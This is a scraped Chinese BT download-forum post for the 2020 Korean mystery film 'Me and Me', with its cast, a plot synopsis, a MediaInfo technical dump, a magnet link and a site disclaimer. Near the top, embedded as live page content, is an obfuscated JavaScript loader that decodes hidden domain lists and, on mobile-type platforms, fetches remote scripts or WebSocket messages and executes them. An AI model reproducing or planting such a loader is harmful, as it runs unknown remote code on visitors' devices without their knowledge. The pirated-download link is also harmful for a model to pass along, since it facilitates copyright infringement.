非常真相[中文字幕]Me.and.Me.2020.1080p.BluRay.DTS.x265-10bit-迅雷下载 6.06GB

版主小s 23天前 682

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 非常真相 / Me and Me / 双面追缉(台) / 流逝的时间 / 消失的时间 / ??? ? ?

◎片 名 ??? ??

◎年 代 2020

◎产 地 韩国

◎类 别 悬疑

◎语 言 韩语

◎上映日期 2020-06-18(韩国)

◎IMDb评分 5.9/10 from 157 users

◎IMDb链接 https://www.imdb.com/title/tt12805676

◎豆瓣评分 5.3/10 from 972 users

◎豆瓣链接 https://movie.douban.com/subject/30347020/

◎片 长 105分钟

◎导 演 郑镇荣 Jin-yeong Jeong

◎编 剧 郑镇荣 Jin-yeong Jeong

◎主 演 赵震雄 Cho Jin-woong

裴秀彬 Bae Soo Bin

车秀妍 Su-yeon Cha

郑海钧 Hae-kyun Jung

卢康民 No Kang-min

金胤成 Kim Yoon-seong

朴斗植 Doo-sik Park

李善彬 Sun-bin Lee

申东美 Dong-Mi Shin

张元英 Won-yeong Jang

◎标 签 韩国 | 悬疑 | 2020 | 剧情 | 犯罪 | 人性 | 电影 | 黑色幽默

◎简 介

秀赫是一个乡村小学的老师。他有一个秘密:每天晚上,他的妻子易英都会变成另一个人。有一天,他的一个学生的父亲知道了他们的秘密,并告知村民易英的身体每晚被一种恶灵所占据。村民一致认为易英非常危险,他们要求易英每晚进入上锁的笼子。结果这对夫妻很快在不明原因的大火中丧生。一名警探被派来调查,他一个接一个地审问村民,村子上的气氛逐渐变得诡异。一天晚上,村民们邀请警探到市政厅喝一杯。喝酒后,警探失去了意识。第二天,警探在之前那个笼子里醒来,但是每个人都称他为“老师”。他意识到自己已经变成了秀赫……

◎获奖情况

第41届韩国电影青龙奖(2020)

最佳新人导演(提名) 郑镇荣

  1. General

  2. Unique ID : 21354227614094984879245122748465912081 (0x1010ACB53717DE469773D57312099911)

  3. Complete name : Me.and.Me.2020.1080p.BluRay.DTS.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 6.06 GiB

  7. Duration : 1 h 44 min

  8. Overall bit rate : 8 265 kb/s

  9. Movie name : Me and Me 2020 1080p BluRay DTS x265-10bit-HDS

  10. Encoded date : UTC 2021-07-08 00:30:02

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 44 min

  20. Bit rate : 6 725 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 040 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.140

  30. Stream size : 4.93 GiB (81%)

  31. Title : [email protected]

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 44 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.11 GiB (18%)

  50. Title : Korean

  51. Language : Korean

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 1 h 40 min

  61. Bit rate : 29.4 kb/s

  62. Count of elements : 2620

  63. Stream size : 21.0 MiB (0%)

  64. Title : CHS

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 40 min

  75. Bit rate : 30.1 kb/s

  76. Count of elements : 2620

  77. Stream size : 21.5 MiB (0%)

  78. Title : CHT

  79. Language : Chinese

  80. Default : No

  81. Forced : No


  82. Menu

  83. 00:00:00.000 : en:Chapter 01

  84. 00:08:53.992 : en:Chapter 02

  85. 00:17:23.251 : en:Chapter 03

  86. 00:23:41.420 : en:Chapter 04

  87. 00:33:39.434 : en:Chapter 05

  88. 00:44:22.285 : en:Chapter 06

  89. 00:54:33.520 : en:Chapter 07

  90. 01:03:37.063 : en:Chapter 08

  91. 01:11:21.027 : en:Chapter 09

  92. 01:19:35.646 : en:Chapter 10

  93. 01:29:47.757 : en:Chapter 11

  94. 01:41:27.915 : en:Chapter 12


TAGS 悬疑

磁力链:
  • magnet:?xt=urn:btih:AD275C00D0A09AC2D21BC357A74820609216D529
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖